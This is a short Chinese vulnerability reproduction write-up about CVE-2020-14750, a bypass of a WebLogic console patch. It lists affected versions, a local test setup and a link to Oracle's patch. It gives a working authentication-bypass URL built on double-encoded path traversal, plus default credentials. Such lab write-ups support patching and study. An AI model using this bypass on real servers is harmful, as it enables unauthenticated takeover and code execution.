标签：www 12c console WebLogic 14750 2020 Oracle weblogic CVE

0x01 漏洞概述

Oracle Fusion Middleware（Oracle融合中间件）是美国甲骨文（Oracle）公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。

Oracle WebLogic Server Oracle Fusion Middleware Console 多版本存在安全漏洞，该漏洞是CVE-2020-14882 补丁的绕过，远程攻击者可以构造特殊的 HTTP 请求，在未经身份验证的情况下接管 WebLogic Server Console ，从而执行任意代码。

 

 

0x02 影响版本

 

Oracle:Weblogic : 10.3.6.0.0 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 14.1.1.0.0

 

 

 

0x03 环境搭建

• windows10 x64
  
• jdk 1.8.0
• WebLogic 12c

 

①下载weblogic 12c

　　https://www.oracle.com/middleware/technologies/fusionmiddleware-downloads.html

 

②安装weblogic 12c

　　1. 使用jdk1.8打开下载的fmw_12.1.3.0.0_wls.jar开始安装

　　　　安装过程参考了博客

　　　　https://www.cnblogs.com/smile502/p/12784978.html

 

　　2. 安装完在目录下运行startWebLogic.cmd

 

③启动完毕后在浏览器访问

　　

 

 

 

0x04 漏洞复现

①观察正常成功登陆的页面URL（默认账号密码weblogic/weblogic）

　　http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1

 

 

②构造URL绕过登陆

　　http://127.0.0.1:7001/console/images/%252E./console.portal

　　这里的%252E是 . 二次url编码的结果

　　成功绕过登陆：

　　

 

 

 0x05 修复建议

　　下载官方补丁进行修复

　　https://www.oracle.com/security-alerts/alert-cve-2020-14750.html

 

标签：www,12c,console,WebLogic,14750,2020,Oracle,weblogic,CVE
来源： https://www.cnblogs.com/Salvere-Safe/p/15171991.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。